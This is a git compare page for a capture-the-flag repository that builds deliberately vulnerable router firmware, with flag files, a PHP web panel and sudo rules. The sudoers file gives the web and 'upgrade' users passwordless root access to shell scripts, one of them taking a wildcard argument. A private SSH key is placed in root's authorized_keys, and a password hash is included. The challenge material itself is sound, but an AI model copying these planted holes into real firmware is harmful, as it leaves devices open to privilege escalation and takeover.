g/cyberchallenge-modem
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Compare commits

base: g:master
Branches Tags
g:master
g:production
g:u-boot-imx_v2018.03_4.14.98_2.0.0_ga
g:u-boot-imx_latest
..
compare: g:u-boot-imx_v2018.03_4.14.98_2.0.0_ga
Branches Tags
g:master
g:production
g:u-boot-imx_v2018.03_4.14.98_2.0.0_ga
g:u-boot-imx_latest

No commits in common. "master" and "u-boot-imx_v2018.03_4.14.98_2.0.0_ga" have entirely different histories.
master ... u-boot-imx

40 changed files with 5532 additions and 7677 deletions
Show Stats Expand all files Collapse all files

1
.gitignore vendored
View File

@ -1 +0,0 @@
target/

4
Readme.md
View File

@ -41,10 +41,10 @@ E' consigliabile trovare almeno due beta tester per la challenge che sperimentin
Per Debian 10, installare
```
sudo apt install -y build-essential libncurses-dev bison flex libssl-dev libelf-dev wget curl rsync unzip
sudo apt install -t build-essential libncurses-dev bison flex libssl-dev libelf-dev
```
Per la cross compilazione del keygen su ARM installare
Per la cross compilazioen del keygen su ARM installare
```
sudo apt install crossbuild-essential-arm64

23
build-tgr.sh
View File

@ -10,9 +10,11 @@
#flag1=$1
#flag2=$2
#flag3=$3
flag1="cc{prima_flag}"
flag2="cc{seconda_flag}"
flag3="cc{terza_flag}"
password=`hexdump -n 32 -e '4/4 "%08X"' /dev/urandom`
echo "[+] Starting build script..."
@ -28,19 +30,19 @@ cp -R conf/* target/overlay # copy target system config files
cp -R webpanel/* target/overlay/var/www/html # copy the webpanel
cp -R update/update.sh target/overlay #copy the update script and certificate
echo "[+] Adding firmware"
mkdir -p target/overlay/lib
cp -R firmware target/overlay/lib/ # adding binary firmware for wifi driver
echo "[+] Writing flags"
sed -i "s/##FLAG1##/$flag1/g" target/overlay/var/www/html/includes/config.php
echo $flag2 > target/overlay/flag
chmod 444 target/overlay/flag
mkdir target/overlay/root
chmod 700 target/overlay/root
echo $flag3 > target/overlay/root/flag
chmod 400 target/overlay/root/flag
echo "[+] Building the keygen"
mkdir -p target/overlay/usr/sbin
aarch64-linux-gnu-gcc -o target/overlay/usr/sbin/cfgbin keygen/keygen.c -static -lm
aarch64-linux-gnu-strip target/overlay/usr/sbin/cfgbin
strip target/overlay/usr/sbin/cfgbin
echo "[+] Generating Update Key"
mkdir -p target/keys
@ -48,20 +50,11 @@ openssl genrsa -out target/keys/signingkey.pem 2048
openssl rsa -in target/keys/signingkey.pem -outform PEM -pubout -out target/keys/signingpub.pem
cp target/keys/signingpub.pem target/overlay/pub.pem
echo "[+] Generating sample update package"
mkdir -p home/upgrade
echo "sample update" > home/upgrade/sample.txt
tar -cvf update.tar home
openssl dgst -sha256 -sign target/keys/signingkey.pem -out update.tar.sig update.tar
cat update.tar > update.tar.cc
cat update.tar.sig >> update.tar.cc
mv update.tar.cc target/overlay
rm -rf home update.tar update.tar.sig
echo "[+] Generating Monitoring SSH Key"
ssh-keygen -t ecdsa -f target/keys/sshkey -q -N ""
mkdir -p target/overlay/root/.ssh
cp target/keys/sshkey target/overlay/root/.ssh/authorized_keys
chmod -R 600 target/overlay/root/.ssh/
echo "[+] Saving the root password"
echo $password > target/keys/rootpassword

41
buildroot/board/freescale/common/imx/genimage.cfg.template_imx8
View File

@ -1,41 +0,0 @@
# Minimal SD card image for the Freescale iMX8 boards
#
# We mimic the .sdcard Freescale's image format:
# * the SD card must have 33 kB free space at the beginning,
# * U-Boot is integrated into imx8-boot-sd.bin and is dumped as is,
# * a FAT partition at offset 8MB is containing Image and DTB files
# * a single root filesystem partition is required (ext2, ext3 or ext4)
#
image boot.vfat {
vfat {
label = "boot"
files = {
%FILES%
}
}
size = 64M
}
image sdcard.img {
hdimage {
}
partition imx-boot {
in-partition-table = "no"
image = "imx8-boot-sd.bin"
offset = %IMXOFFSET%
}
partition boot {
partition-type = 0xC
bootable = "true"
image = "boot.vfat"
offset = 8M
}
partition rootfs {
partition-type = 0x83
image = "rootfs.ext2"
}
}

1194
buildroot/board/tiesse/tgr/busybox.config
View File

File diff suppressed because it is too large Load Diff

2
buildroot/board/tiesse/tgr/linux.config
View File

@ -314,7 +314,6 @@ CONFIG_USB_NET_QMI_WWAN=m
CONFIG_BRCMFMAC=m
CONFIG_BRCMFMAC_PCIE=y
CONFIG_HOSTAP=y
CONFIG_RFKILL=y
CONFIG_RTL_CARDS=m
# CONFIG_WLAN_VENDOR_TI is not set
CONFIG_XEN_NETDEV_BACKEND=m
@ -869,3 +868,4 @@ CONFIG_CRYPTO_AES_ARM64_CE_CCM=y
CONFIG_CRYPTO_AES_ARM64_CE_BLK=y
CONFIG_CRYPTO_CHACHA20_NEON=m
CONFIG_CRYPTO_AES_ARM64_BS=m

7
buildroot/board/tiesse/tgr/permissions.config
View File

@ -1,7 +0,0 @@
/var/www/html/index.php f 755 upgrade upgrade - - - - -
/var/www/html/update.php f 755 upgrade upgrade - - - - -
/var/www/html/utils.php f 755 upgrade upgrade - - - - -
/update.sh f 755 root root - - - - -
/root/ d 700 root root - - - - -
/root/.ssh/ d 700 root root - - - - -
/root/.ssh/authorized_keys f 644 root root - - - - -

16
buildroot/board/tiesse/tgr/uboot-patches/0000-Add-imx8mm-tgr-support.patch Normal file → Executable file
View File

@ -4503,7 +4503,7 @@ Index: u-boot-imx/include/configs/tgr.h
===================================================================
--- /dev/null
+++ u-boot-imx/include/configs/tgr.h
@@ -0,0 +1,357 @@
@@ -0,0 +1,361 @@
+/*
+ * Copyright 2018 NXP
+ *
@ -4657,8 +4657,8 @@ Index: u-boot-imx/include/configs/tgr.h
+ "root=ubi0:nandrootfs rootfstype=ubifs " \
+ MFG_NAND_PARTITION \
+ "\0" \
+ "bootcmd=fatload mmc 1:1 ${fdt_addr} fsl-imx8mm-tgr.dtb;"\
+ "fatload mmc 1:1 ${loadaddr} Image;"\
+ "bootcmd=nand read ${loadaddr} 0x5000000 0x2000000;"\
+ "nand read ${fdt_addr} 0x7000000 0x100000;"\
+ "booti ${loadaddr} - ${fdt_addr}"
+
+#else
@ -4681,9 +4681,13 @@ Index: u-boot-imx/include/configs/tgr.h
+ "mmcautodetect=yes\0"
+
+#define CONFIG_BOOTCOMMAND \
+ "fatload mmc 1:1 ${fdt_addr} fsl-imx8mm-tgr.dtb;" \
+ "fatload mmc 1:1 ${loadaddr} Image;" \
+ "booti ${loadaddr} - ${fdt_addr}; "
+ "mmc dev ${mmcdev}; " \
+ "if mmc rescan; then " \
+ "ext4load mmc 1:2 ${loadaddr} boot/Image; " \
+ "ext4load mmc 1:2 ${fdt_addr} usr/lib/linux-image-4.14.98-tgr/freescale/fsl-imx8mm-tgr.dtb; " \
+ "ext4load mmc 1:2 ${initrd_addr} boot/initramfs.uImage; " \
+ "booti ${loadaddr} ${initrd_addr} ${fdt_addr}; " \
+ "else echo Cannot boot from emmc; fi"
+#endif
+
+/* Link Definitions */

1
buildroot/board/tiesse/tgr/users.config
View File

@ -1 +0,0 @@
upgrade -1 upgrade -1 $1$.siVnLGd$z5FlFeSii/ily9wng5lxS/ /home/upgrade /bin/sh -

0
buildroot/board/tiesse/tgr/packages-patches/qcacld/0001-MLK-18491-02-qcacld-2.0-fix-the-overflow-of-bounce-b.patch → buildroot/board/tiesse/tgr/wireless-patches/0001-MLK-18491-02-qcacld-2.0-fix-the-overflow-of-bounce-b.patch
View File

11
buildroot/configs/tiesse_tgr_defconfig
View File

@ -43,20 +43,16 @@ BR2_PACKAGE_HOST_IMX_MKIMAGE=y
BR2_PACKAGE_HOST_MTOOLS=y
BR2_PACKAGE_HOST_UBOOT_TOOLS=y
BR2_PACKAGE_HOST_UBOOT_TOOLS_FIT_SUPPORT=y
BR2_PACKAGE_BUSYBOX_CONFIG="board/tiesse/tgr/busybox.config"
BR2_GLOBAL_PATCH_DIR="board/tiesse/tgr/packages-patches/"
BR2_RELRO_FULL=y
BR2_TARGET_GENERIC_HOSTNAME="ccos"
BR2_TARGET_GENERIC_HOSTNAME="cros"
BR2_TARGET_GENERIC_ISSUE="1337 Linux"
BR2_TARGET_ENABLE_ROOT_LOGIN=y
BR2_TARGET_GENERIC_ROOT_PASSWD="###ROOTPASSWORD###"
BR2_ROOTFS_USERS_TABLES="board/tiesse/tgr/users.config"
BR2_ROOTFS_DEVICE_TABLE="board/tiesse/tgr/permissions.config"
BR2_SYSTEM_DHCP="eth0"
BR2_ROOTFS_OVERLAY="../overlay"
BRW_PACKAGE_QCACLD=Y
BR2_PACKAGE_BUSYBOX_SHOW_OTHERS=y
BR2_PACKAGE_RNG_TOOLS=y
BR2_PACKAGE_PHP=y
BR2_PACKAGE_PHP_SAPI_FPM=y
# BR2_PACKAGE_PHP_EXT_SESSION is not set
@ -111,6 +107,3 @@ BR2_PACKAGE_SUDO=y
BR2_PACKAGE_WIREGUARD_LINUX_COMPAT=y
BR2_PACKAGE_WIREGUARD_TOOLS=y
# BR2_PACKAGE_WIREGUARD is not set
BR2_PACKAGE_WPA_SUPPLICANT=y
BR2_PACKAGE_WPA_SUPPLICANT_CLI=y
BR2_PACKAGE_WPA_SUPPLICANT_PASSPHRASE=y

4
buildroot/package/qcacld/Config.in
View File

@ -1,4 +0,0 @@
config BR2_PACKAGE_QCACLD
bool "qcacld"
help
QCACLD kernel driver.

30
buildroot/package/qcacld/qcacld.mk
View File

@ -1,30 +0,0 @@
################################################################################
#
# qcacld
#
################################################################################
QCACLD_VERSION = IMX_CNSS.LEA.NRT_2.0
QCACLD_SITE = https://source.codeaurora.org/external/imx/qcacld-2.0-imx
QCACLD_SITE_METHOD = git
QCACLD_LICENSE = ISC
QCACLD_FILES = COPYING
QCACLD_MODULE_MAKE_OPTS = \
CONFIG_CFG80211_INTERNAL_REGDB=y \
CONFIG_HDD_WLAN_WAIT_TIME=10000 \
CONFIG_LINUX_QCMBR=y \
CONFIG_NON_QC_PLATFORM=y \
CONFIG_PMF_SUPPORT=y \
TARGET_BUILD_VARIANT=user \
CONFIG_ROME_IF=pci \
CONFIG_WLAN_FEATURE_11W=y \
CONFIG_WLAN_FEATURE_FILS=y \
CONFIG_WLAN_WAPI_MODE_11AC_DISABLE=y \
MODNAME=qca6174
define KERNEL_MODULE_BUILD_CMDS
$(MAKE) -C '$(@D)' KERNEL_SRC='$(LINUX_DIR)' CC='$(TARGET_CC)' LD='$(TARGET_LD)' modules
endef
$(eval $(kernel-module))
$(eval $(generic-package))

1
conf/etc/dhcp/dhcpd.conf
View File

@ -1,6 +1,5 @@
default-lease-time 600;
max-lease-time 14400;
#option domain-name-servers 1.1.1.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.77.255;

2
conf/etc/hostapd.conf
View File

@ -1,4 +1,4 @@
interface=ap0
interface=wlan0
hw_mode=g
channel=1
wmm_enabled=1

15
conf/etc/init.d/S02modules
View File

@ -1,15 +0,0 @@
#!/bin/sh
case "$1" in
start)
printf "Loading kernel modules: "
/sbin/modprobe qca6174
/sbin/modprobe wireguard
[ $? = 0 ] && echo "OK" || echo "FAIL"
;;
*)
echo "Usage: $0 {start}"
exit 1
esac
exit 0

16
conf/etc/init.d/S05wlan-interfaces
View File

@ -1,16 +0,0 @@
#!/bin/sh
case "$1" in
start)
printf "Starting wireless device: "
iw dev wlan0 del
iw phy phy0 interface add ap0 type __ap
iw phy phy0 interface add client0 type station
[ $? = 0 ] && echo "OK" || echo "FAIL"
;;
*)
echo "Usage: $0 {start}"
exit 1
esac
exit 0

1
conf/etc/init.d/S23cfgbin → conf/etc/init.d/S10cfgbin
View File

@ -11,7 +11,6 @@ case "$1" in
WPA=`cat /etc/wpa`
sed -i "s/{{SSID}}/$SSID/g" /etc/hostapd.conf
sed -i "s/{{WPA}}/$WPA/g" /etc/hostapd.conf
echo "OK"
;;
*)
echo "Usage: $0 {start}"

18
conf/etc/init.d/S22waitrng
View File

@ -1,18 +0,0 @@
#!/bin/sh
case "$1" in
start)
status=`cat /proc/sys/kernel/random/entropy_avail`
printf "Waiting for enough entropy: "
while [ $status -lt 200 ]; do
sleep 2
status=`cat /proc/sys/kernel/random/entropy_avail`
done
echo "OK"
;;
*)
echo "Usage: $0 {start}"
exit 1
esac
exit 0

2
conf/etc/init.d/S80dhcp-server
View File

@ -3,7 +3,7 @@
# $Id: dhcp3-server.init.d,v 1.4 2003/07/13 19:12:41 mdz Exp $
#
INTERFACES="ap0"
INTERFACES="wlan0"
OPTIONS=""
NAME="dhcpd"

10
conf/etc/network/interfaces
View File

@ -3,14 +3,8 @@ iface lo inet loopback
auto eth0
iface eth0 inet dhcp
pre-up sleep 20
auto ap0
iface ap0 inet static
auto wlan0
iface wlan0 inet static
address 192.168.77.1
netmask 255.255.255.0
auto client0
iface client0 inet manual
pre-up ifconfig $IFACE up
post-down ifconfig $IFACE down

4
conf/etc/sudoers
View File

@ -1,5 +1,4 @@
Defaults env_reset
Defaults env_keep = "key"
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults logfile="/var/log/sudo.log"
@ -9,5 +8,4 @@ Defaults passwd_tries=3
Defaults insults
Defaults log_input,log_output
www-data ALL=(upgrade) NOPASSWD: /bin/sh /update.sh
upgrade ALL=(root) NOPASSWD: /usr/sbin/iw client0 scan, /usr/sbin/iw client0 link, /bin/cat /etc/wpa_supplicant.conf, /bin/sh /wifi/connect.sh *, /bin/sh /wifi/disconnect.sh
www-data ALL=(root) NOPASSWD: /bin/sh /update.sh

0
conf/etc/wpa_supplicant.conf
View File

BIN
conf/lib/modules/4.14.98/extra/qca6174.ko
View File

Binary file not shown.

190
conf/lib/modules/4.14.98/modules.dep
View File

@ -1,190 +0,0 @@
kernel/arch/arm64/crypto/crct10dif-ce.ko:
kernel/arch/arm64/crypto/crc32-ce.ko:
kernel/arch/arm64/crypto/aes-neon-blk.ko:
kernel/arch/arm64/crypto/sha512-arm64.ko:
kernel/arch/arm64/crypto/chacha20-neon.ko:
kernel/arch/arm64/crypto/aes-neon-bs.ko: kernel/arch/arm64/crypto/aes-neon-blk.ko
kernel/fs/nfs/flexfilelayout/nfs_layout_flexfiles.ko:
kernel/fs/fuse/fuse.ko:
kernel/fs/fuse/cuse.ko: kernel/fs/fuse/fuse.ko
kernel/fs/overlayfs/overlay.ko:
kernel/fs/btrfs/btrfs.ko: kernel/crypto/xor.ko kernel/lib/zstd/zstd_decompress.ko kernel/lib/zstd/zstd_compress.ko kernel/lib/xxhash.ko kernel/lib/raid6/raid6_pq.ko
kernel/crypto/crypto_engine.ko:
kernel/crypto/tcrypt.ko:
kernel/crypto/xor.ko:
kernel/drivers/phy/rockchip/phy-rockchip-pcie.ko:
kernel/drivers/pwm/pwm-bcm2835.ko:
kernel/drivers/pwm/pwm-cros-ec.ko:
kernel/drivers/pwm/pwm-meson.ko:
kernel/drivers/pwm/pwm-tegra.ko:
kernel/drivers/pci/host/pcie-rockchip.ko:
kernel/drivers/video/backlight/lcd.ko:
kernel/drivers/video/backlight/generic_bl.ko:
kernel/drivers/video/backlight/lp855x_bl.ko:
kernel/drivers/dma/bcm-sba-raid.ko: kernel/lib/raid6/raid6_pq.ko
kernel/drivers/dma/bcm2835-dma.ko:
kernel/drivers/soc/qcom/mdt_loader.ko:
kernel/drivers/gpu/drm/i2c/ch7006.ko:
kernel/drivers/gpu/drm/i2c/sil164.ko:
kernel/drivers/gpu/drm/bridge/analogix/analogix_dp.ko:
kernel/drivers/gpu/drm/hisilicon/kirin/kirin-drm.ko:
kernel/drivers/gpu/drm/hisilicon/kirin/dw_drm_dsi.ko:
kernel/drivers/gpu/drm/ttm/ttm.ko:
kernel/drivers/gpu/drm/vc4/vc4.ko:
kernel/drivers/gpu/drm/nouveau/nouveau.ko: kernel/drivers/gpu/drm/ttm/ttm.ko
kernel/drivers/gpu/drm/exynos/exynosdrm.ko:
kernel/drivers/gpu/drm/rockchip/rockchipdrm.ko: kernel/drivers/gpu/drm/bridge/analogix/analogix_dp.ko
kernel/drivers/gpu/drm/rcar-du/rcar-du-drm.ko: kernel/drivers/media/platform/vsp1/vsp1.ko kernel/drivers/media/platform/rcar-fcp.ko
kernel/drivers/gpu/drm/msm/msm.ko: kernel/drivers/soc/qcom/mdt_loader.ko
kernel/drivers/gpu/drm/tegra/tegra-drm.ko: kernel/drivers/gpu/host1x/host1x.ko
kernel/drivers/gpu/drm/meson/meson-drm.ko:
kernel/drivers/gpu/drm/meson/meson_dw_hdmi.ko: kernel/drivers/gpu/drm/meson/meson-drm.ko
kernel/drivers/gpu/host1x/host1x.ko:
kernel/drivers/block/nbd.ko:
kernel/drivers/misc/eeprom/at25.ko:
kernel/drivers/mfd/exynos-lpass.ko:
kernel/drivers/nvme/host/nvme-core.ko:
kernel/drivers/nvme/host/nvme.ko: kernel/drivers/nvme/host/nvme-core.ko
kernel/drivers/spi/spi-bcm2835.ko:
kernel/drivers/spi/spi-bcm2835aux.ko:
kernel/drivers/spi/spi-meson-spicc.ko:
kernel/drivers/spi/spi-meson-spifc.ko:
kernel/drivers/net/phy/marvell.ko:
kernel/drivers/net/phy/meson-gxl.ko:
kernel/drivers/net/phy/realtek.ko:
kernel/drivers/net/ethernet/qualcomm/emac/qcom-emac.ko:
kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko:
kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-meson.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-meson8b.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-sunxi.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-sun8i.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-generic.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
kernel/drivers/net/ppp/ppp_async.ko: kernel/lib/crc-ccitt.ko
kernel/drivers/net/ppp/ppp_deflate.ko:
kernel/drivers/net/ppp/ppp_synctty.ko:
kernel/drivers/net/wireless/broadcom/brcm80211/brcmutil/brcmutil.ko:
kernel/drivers/net/wireless/broadcom/brcm80211/brcmfmac/brcmfmac.ko: kernel/drivers/net/wireless/broadcom/brcm80211/brcmutil/brcmutil.ko
kernel/drivers/net/usb/pegasus.ko:
kernel/drivers/net/usb/rtl8150.ko:
kernel/drivers/net/usb/r8152.ko:
kernel/drivers/net/usb/asix.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/ax88179_178a.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/cdc_ether.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/dm9601.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/sr9800.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/smsc75xx.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/smsc95xx.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/net1080.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/plusb.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/cdc_subset.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/zaurus.ko: kernel/drivers/net/usb/cdc_ether.ko kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/mcs7830.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/usbnet.ko:
kernel/drivers/net/usb/cdc_ncm.ko: kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/qmi_wwan.ko: kernel/drivers/usb/class/cdc-wdm.ko kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/usb/cdc_mbim.ko: kernel/drivers/net/usb/cdc_ncm.ko kernel/drivers/usb/class/cdc-wdm.ko kernel/drivers/net/usb/usbnet.ko
kernel/drivers/net/bonding/bonding.ko:
kernel/drivers/net/macvlan.ko:
kernel/drivers/net/macvtap.ko: kernel/drivers/net/macvlan.ko kernel/drivers/net/tap.ko
kernel/drivers/net/tap.ko:
kernel/drivers/net/veth.ko:
kernel/drivers/net/vxlan.ko:
kernel/drivers/net/xen-netback/xen-netback.ko:
kernel/drivers/usb/misc/usbtest.ko:
kernel/drivers/usb/gadget/legacy/g_zero.ko:
kernel/drivers/usb/gadget/legacy/g_audio.ko:
kernel/drivers/usb/gadget/legacy/g_ether.ko:
kernel/drivers/usb/gadget/legacy/g_mass_storage.ko:
kernel/drivers/usb/gadget/legacy/g_serial.ko:
kernel/drivers/usb/gadget/legacy/g_cdc.ko:
kernel/drivers/usb/gadget/legacy/g_ncm.ko:
kernel/drivers/usb/class/cdc-acm.ko:
kernel/drivers/usb/class/cdc-wdm.ko:
kernel/drivers/usb/renesas_usbhs/renesas_usbhs.ko:
kernel/drivers/input/keyboard/adc-keys.ko:
kernel/drivers/rtc/rtc-rk808.ko:
kernel/drivers/i2c/busses/i2c-bcm2835.ko:
kernel/drivers/media/platform/s5p-jpeg/s5p-jpeg.ko:
kernel/drivers/media/platform/s5p-mfc/s5p-mfc.ko:
kernel/drivers/media/platform/exynos-gsc/exynos-gsc.ko:
kernel/drivers/media/platform/rcar-fcp.ko:
kernel/drivers/media/platform/vsp1/vsp1.ko: kernel/drivers/media/platform/rcar-fcp.ko
kernel/drivers/media/usb/uvc/uvcvideo.ko:
kernel/drivers/media/usb/gspca/gspca_main.ko:
kernel/drivers/hwmon/ina2xx.ko:
kernel/drivers/hwmon/lm90.ko:
kernel/drivers/thermal/rockchip_thermal.ko:
kernel/drivers/watchdog/meson_gxbb_wdt.ko:
kernel/drivers/watchdog/meson_wdt.ko:
kernel/drivers/cpufreq/cppc_cpufreq.ko:
kernel/drivers/crypto/virtio/virtio_crypto.ko: kernel/crypto/crypto_engine.ko
kernel/drivers/crypto/bcm/bcm_crypto_spu.ko:
kernel/drivers/rpmsg/imx_rpmsg_pingpong.ko:
kernel/drivers/rpmsg/imx_rpmsg_tty.ko:
kernel/drivers/iio/adc/rockchip_saradc.ko:
kernel/sound/core/snd-hwdep.ko:
kernel/sound/usb/snd-usb-audio.ko: kernel/sound/core/snd-hwdep.ko kernel/sound/usb/snd-usbmidi-lib.ko
kernel/sound/usb/snd-usbmidi-lib.ko:
kernel/sound/soc/bcm/snd-soc-bcm2835-i2s.ko:
kernel/net/802/stp.ko:
kernel/net/802/garp.ko: kernel/net/802/stp.ko
kernel/net/802/mrp.ko:
kernel/net/netfilter/nf_conntrack.ko: kernel/lib/libcrc32c.ko
kernel/net/netfilter/nf_log_common.ko:
kernel/net/netfilter/nf_nat.ko: kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/netfilter/x_tables.ko:
kernel/net/netfilter/xt_tcpudp.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_nat.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_CHECKSUM.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_LOG.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_addrtype.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_bpf.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_conntrack.ko: kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_ipvs.ko: kernel/net/netfilter/ipvs/ip_vs.ko kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/xt_cgroup.ko: kernel/net/netfilter/x_tables.ko
kernel/net/netfilter/ipvs/ip_vs.ko:
kernel/net/netfilter/ipvs/ip_vs_rr.ko: kernel/net/netfilter/ipvs/ip_vs.ko
kernel/net/ipv4/netfilter/nf_conntrack_ipv4.ko: kernel/net/ipv4/netfilter/nf_defrag_ipv4.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv4/netfilter/nf_nat_ipv4.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv4/netfilter/nf_defrag_ipv4.ko:
kernel/net/ipv4/netfilter/nf_log_ipv4.ko: kernel/net/netfilter/nf_log_common.ko
kernel/net/ipv4/netfilter/nf_reject_ipv4.ko:
kernel/net/ipv4/netfilter/nf_nat_masquerade_ipv4.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv4/netfilter/ip_tables.ko: kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/netfilter/iptable_filter.ko: kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/netfilter/iptable_mangle.ko: kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/netfilter/iptable_nat.ko: kernel/net/ipv4/netfilter/nf_nat_ipv4.ko kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/netfilter/ipt_MASQUERADE.ko: kernel/net/ipv4/netfilter/nf_nat_masquerade_ipv4.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/netfilter/ipt_REJECT.ko: kernel/net/ipv4/netfilter/nf_reject_ipv4.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv4/tunnel4.ko:
kernel/net/ipv6/netfilter/ip6_tables.ko: kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/netfilter/ip6table_filter.ko: kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/netfilter/ip6table_mangle.ko: kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/netfilter/ip6table_nat.ko: kernel/net/ipv6/netfilter/nf_nat_ipv6.ko kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/netfilter/nf_conntrack_ipv6.ko: kernel/net/ipv6/netfilter/nf_defrag_ipv6.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv6/netfilter/nf_nat_ipv6.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv6/netfilter/nf_nat_masquerade_ipv6.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
kernel/net/ipv6/netfilter/nf_defrag_ipv6.ko:
kernel/net/ipv6/netfilter/nf_log_ipv6.ko: kernel/net/netfilter/nf_log_common.ko
kernel/net/ipv6/netfilter/nf_reject_ipv6.ko:
kernel/net/ipv6/netfilter/ip6t_MASQUERADE.ko: kernel/net/ipv6/netfilter/nf_nat_masquerade_ipv6.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/netfilter/ip6t_REJECT.ko: kernel/net/ipv6/netfilter/nf_reject_ipv6.ko kernel/net/netfilter/x_tables.ko
kernel/net/ipv6/xfrm6_mode_transport.ko:
kernel/net/ipv6/xfrm6_mode_tunnel.ko:
kernel/net/ipv6/xfrm6_mode_beet.ko:
kernel/net/ipv6/sit.ko: kernel/net/ipv4/tunnel4.ko
kernel/net/8021q/8021q.ko: kernel/net/802/garp.ko kernel/net/802/stp.ko kernel/net/802/mrp.ko
kernel/net/bridge/bridge.ko: kernel/net/802/stp.ko
kernel/net/bridge/br_netfilter.ko: kernel/net/bridge/bridge.ko kernel/net/802/stp.ko
kernel/lib/crc-ccitt.ko:
kernel/lib/libcrc32c.ko:
kernel/lib/xxhash.ko:
kernel/lib/zstd/zstd_compress.ko: kernel/lib/xxhash.ko
kernel/lib/zstd/zstd_decompress.ko: kernel/lib/xxhash.ko
kernel/lib/raid6/raid6_pq.ko:
extra/wireguard.ko:
extra/qca6174.ko:

11
conf/wifi/connect.sh
View File

@ -1,11 +0,0 @@
#!/bin/sh
if [ "$#" -ne 2 ]; then
echo "Usage: connect.sh: <ssid> <psk>"
exit 1
fi
